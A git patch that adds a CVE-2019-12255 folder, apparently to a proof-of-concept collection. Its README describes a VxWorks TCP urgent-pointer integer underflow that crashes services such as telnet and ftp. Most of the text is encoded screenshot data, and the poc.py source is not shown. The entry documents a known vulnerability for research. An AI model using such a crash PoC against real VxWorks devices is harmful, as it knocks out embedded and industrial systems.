From 9c6e6030b1241681c002742b2bbcb7873caeb175 Mon Sep 17 00:00:00 2001 From: xzz Date: Sun, 11 Aug 2019 22:01:23 +0800 Subject: [PATCH] add CVE-2019-12255 --- CVE-2019-12255/README.md | 11 +++++++++++ CVE-2019-12255/crash_ftp.png | Bin 0 -> 29435 bytes CVE-2019-12255/crash_telnet.png | Bin 0 -> 31408 bytes CVE-2019-12255/poc.py | 19 +++++++++++++++++++ 4 files changed, 30 insertions(+) create mode 100644 CVE-2019-12255/README.md create mode 100644 CVE-2019-12255/crash_ftp.png create mode 100644 CVE-2019-12255/crash_telnet.png create mode 100755 CVE-2019-12255/poc.py diff --git a/CVE-2019-12255/README.md b/CVE-2019-12255/README.md new file mode 100644 index 0000000..78bc921 --- /dev/null +++ b/CVE-2019-12255/README.md @@ -0,0 +1,11 @@ +## CVE-2019-12255 +VxWorks TCP Urgent pointer = 0 integer underflow + +## Discovered By +Armis Security + +## Vulnerability Summary +The vulnerability exists in the IPnet stack of VxWorks. The details of the vulnerability can be found [here](https://i.blackhat.com/USA-19/Thursday/us-19-Seri-Critical-Zero-Days-Remotely-Compromise-The-Most-Popular-Real-Time-OS-wp.pdf). The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc. +![ftp crash](crash_ftp.png) + +![telnet crash](crash_telnet.png) \ No newline at end of file diff --git a/CVE-2019-12255/crash_ftp.png b/CVE-2019-12255/crash_ftp.png new file mode 100644 index 0000000000000000000000000000000000000000..3b9af4d7aaa2cad06e686f6930fe49165f0764bc GIT binary patch literal 29435 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�p2L2aeq$RcVP(S_sps*PHslFO%WwDo!sBA9cT2{Xkk-?VXV-AHyl&gnB-a zjr)g7_!zi^2F3kgV;0QcGfl%R@2R%;6)3GklOEmw>Br1} zF#q>~iSpvm6$a+=Zb5n$=n?RUITXM20Z&jJn7W>`8YQmWIrif^AMT@FMB4gf)yf81 zw;}{o{)wfNS(1RDE)N)kC^ysM%KJ)d&ae{w;8GvOPz4p+ZW{m!EH?#XK7Eh4`v9yBkbnnkCx(W)< z{WoiN0j-BCYONF0n5|kbf7_h4dAd36REt4#+PQjWu$ZJe2#QW+#cB%+0sj8faHlv8 zuC{kV&`6x-h>=E+8P>YS)#!7}|0K5x=B1QkK--$iwQtGP>oR@0gCxIRHBC-+BiN`B z=~<$oaIoh%7&1wAlx*|}e5&un>V(7{euTbq2Bz0+*WhQ_OZv)+UUW0m!U{^NWB0Z~ z0nQgoh#J-RriC35K2VMdkK+5|RC;x4dmMAL$*}8XwH{P9{`poA`pHb6{`$&zmA8A#SR*|GlI!7C2jzF9S30rzrc%;uF0Y{=LSQ9O^60YlDYTFRVid6tf z+yL?8L+y!sW~JMpT_ET>iKtC~1_;$cyAy9~|9rM#Z)=ynYaPdM&o=hzjvklk4&~Pe zr($l>1;-t6#2B@+J-2)|=X_r{jZz15pO}`52$ZpWCm6{TN?@*V{6Nk3?y$t80J>C%M5qly_WMmfd3QRj>C7tS_m2rye_No>-vQ6e zKEq^t5PIdgDOgf69Tq5jjYr51XY=fcN60NBcsoi&3j%ZsV1uQV{3c;IF%~Gd2(!2OPf1O-TMeHkwhr4JP4>{_6L@LQNb(^^YMHmT(C(VmNHfMI zg0AvIEr)kxgRT}s1#We*9$d)P%|?$BWcjqjSP<5eIg*dJt4*TP8EcI;tA*bL%Z;eb zHQw%(WD182qTOPiMBCjp8hpC+y=v*q<7|U+$$Q7EGR;;xfzo$av#Jv9^VHCu-UXx> zJq0?7ex-aLRzCD*W%<=XAXz^4UEhcQ{TtNU?*~u6bn?C4+3*h4$3XN7`|PG+m*e~G zzod_;i}D{Ez3;0nZz6+d0Eu-KsT%Z}5uAoWOe5kl3#OJ2$Aj7mo!cIw{UbEX(01Ze z^*QB|=yU_r{kKWkyrHAFG#pmdbZ^ypi>Z+r#e!lRp!gvJ7NJFuPw@b45SSxyznH-r z(ir3*&i4dO${Ftx#>rwUDE0*-Utrn>&#)>(r-~6-gr&|tI5j}s(_!~Vu=f!Cz z$JoLt$5q`wu4EI|gy$+BH1B(TG_Qdj8`7SCQ3uoK=96RLT@@e_icAYV1#6Lk~f!(|$x z$NygJl|hC<($A*^EhqA1Frx1$mR}(3s6){leYo`9EVym3RIp7qEKv??{RX7H!rp&{ zyl{Q-nLDw2V(-6lYdxhxoO=-6vne`iW@t3^+|ASqeG6Y{5waIIj4x>utGI+wX`&p+ zEXq-Uk-*!54zNi^&9GCRBAh?Cc1GeM8(8C|1h zIK?s65~zG-ntZo5M65U0UStg#_!!(Kor^k#k(^!-Q)O7bSrhJ}AMfO`3FEs3pA92u zCi|qsCHST1#0^Gw64s)f5P~I z@HjaphXbX+f1_dwW4 z7_tR@Ucvr3>G&OC1?sZ|2}M_d)Qcn>xl+dLafj!^bpeBsD$vAjn2FC_WKRNaNf^7r z(O9s#SdBLQR8ZZJRCq+3?#sw5YrL)LKXWjyO{y8~J4WgkG?a7c^2jBr9{e^HwPJAI z>b1XcBVnaxbgwpPhyhRoo{D1);;oXOkZkBa-kn?U$|>+D=nES9$AOyTHAsr=`eZ+< zUb7W0t_3P54Tv<;GD_wS77v!A&L7Lg!|T{E$>%TOE0hl0S7J#{e~aOo_GAFQCsWFJ zef7O>Ffdy<61+MIQax^?+H^c~slL5FJt@JRP*cwxmpsml6guN|(;?0;v_7^e26QoH zIjrr zZt%oul1csRUG(pB;b-%J>#G^XwFq82|J`k4+XpnQftV$byqH!;x^x6nI2>6L5zVAm zDZH)L^I(D|M=~TAo(BMbqb^vODo?2ZZwB~Bg?rYhzN3#UD5M)Y)wiJ}Jm{^a0>u6- z_iTXu!?wMII7-e3NDGA(vdfKs8P2ErE3m@%<T+`%jyHY8yOdVxNKT}pjD*YJ67jj78MRQLXO zE}ecANVfwFrc-y1e;-VtOer7BLHt6lNC!z9f6exYv z63wW!n3NeDij-HXUvYxTC4-c1h|ouT{#Inx)TppkXePtlf+4gGT`r&xk>{a}>P~az z2x8MD5kU-&kIGrp_ZpunSBT2;CVjKGUJNc>83hj}@*UxY!Qu_v3)|wo7*k#&xL-@3 z2)Cd`YM9hg3*N|(U62e%ITT7Uu-YuS+`qX)0@ZIny}Vm)&i3ZDY&h}mhC@UE4` zvelh;h)7p7$5JP=BHCjl5i~7m%#g)VVJ?7nZ>u4Rx-d-qd7#R57E>RIp(jvBrrM>P z$i&IRysQXZj03nEMT-)HqS4gr3n0!zv<(El6M7kIr;R$yg2E8A5h!HhXOz4NWxfJ3 zzOsQ;K`U0XRI7v4pRs7wdHkt7dAFCO>|9(j9s2mOBKqEF*>1(7hQ(h1TfdvT$(VJ` zie5BXzAq{J=F0AH?@Fa!_+Gh-Nu)n2=C_Zl<9r05y^)IN@CA)RK^}n^CeKY*q^Q6< z9ik}x8wsI=@x)p3Wv|4MKu-wemfSlwxi&gaYD7Vd-7-x2LAZ4464= zU%RC-Yg}|;kG_X7m49%ktR4NkKG4!n6OO^ha7pbk$0XjMU*A=oE+dx8uDhybJ@Fk;&$xf*FOZ2_R4&z;xvcKwltAP|p=v6KLDj91%2+#zzGa={jx&UnmCr zJP?7=HBY&s4PilyrxNINI~G%&_V$L{RiK$3%0p_CRkfNX!V)oCy2T@(ao$n3;aDR{}q5Jay^xyb`PRim)d%-~xTshs)Ns5^mC zquaQfX=(>hQoF9j!tmhzCWs`e7RT~{19^rOP#RcJ0Aq%6ghxOrSZ{9RbWgE0?A<-5 z#efRXvmfK{-fGN?ta+IJR!E?ubquE~8zJM<_yJbiG1(7*CL%zQR#qrI3tq3$1p2PT z+;M#kHWG!Gj5SIVRTql*ThS$aZGMtO3)zbqmk(MyU#Ot-4t17*@hp=f4%C?u@1+h#g5apjw2Nl@;l>(s)v5$Cx(7D)s7| zbS-#+NLn80uD0Lt`sti0jX zSQ=Ldm<>wV^dYs{WitX%b9+fhcPpT5j}ZyAa_k@wRHhC}EFj|GAyq!DKs?mv4Vv|B zLD32&bn6EBe+{j{=k4ndifG>Cb`@PwOQ;D2#vCS1G4=)yllUjI2+3gklpY@`lYIZL z;LccwX{>;hxsGzJrS`V6Wkgudt!Z)X0xwaSdTlSF3K6pAnEy{VM$?1{g)0k?7NonQ8@sDSfUTcPAojipuYdk!}PS6!kfF>1mPRttgqVh!bDZ)hNbx< z>uso21u_KY?Moqqabb3Ww0vRvh0yqR^@yxJNUGeAtmy~F?PXD#xn3C~9g^nbSrKLf zp#|_|V>h_dn=5Utfq}Lp$x&gWR>7&mHI(lNq<}}49r_JldNf751;B0pjp*rS$-i^Q z_a6?FMV}4&R(_$ zW#GxAnx~-iX%G>M<4TJCRT7;Z{`pP47Us$EMRna`1&%AU51cc~^6#WWned zO3ZcFIbDCmBT3FuEaV~_%~73kjJWp;o-q`z%-&r5P}SB*wCw56alu4@Ppb+=>P{O3E@eXhQDjbQthRFrH9P`R_b zpa_*!l7p~OSO*)TD(WJ8!7C(U>D$L@xwn=Txzzr{MKF+;3pk`Vw`Xc);0#O$FVqZYq0hhRpo( z``R?ETXJq}?0|seXiXfN%mpDlrp+FtK&rqAqsXT7Ewk+OQzPU}Fl##nv{@^5il}`6 zWWqlHnJuqC=<-s%uBu06w5AP6j-uKS@}Wm+pA*?{r8t16(Uv5;s%v4v-2cs!ddJxr#)o=Xezj`GNk&hk7Q|a@u-UYA94bfZ zL0_oQ#n&he8MqE3JT%8XVeL+q6*3!b`wtc3r!@;Os;(0<4(q8A?LTi}qfMxgu1;M}iCw07ya zB%!^{g==F3cz}xx7d}qHWiN?uTaOH@#X#wDmS4`}RIiONf+0g+O|uT_W8=e6D~{hM zi}e9up)_d5D%8?PS&>MXX;K7v0T74M1u8$c_aQP7gt+yJhe~2FMv7{g*}pmjNl54~ 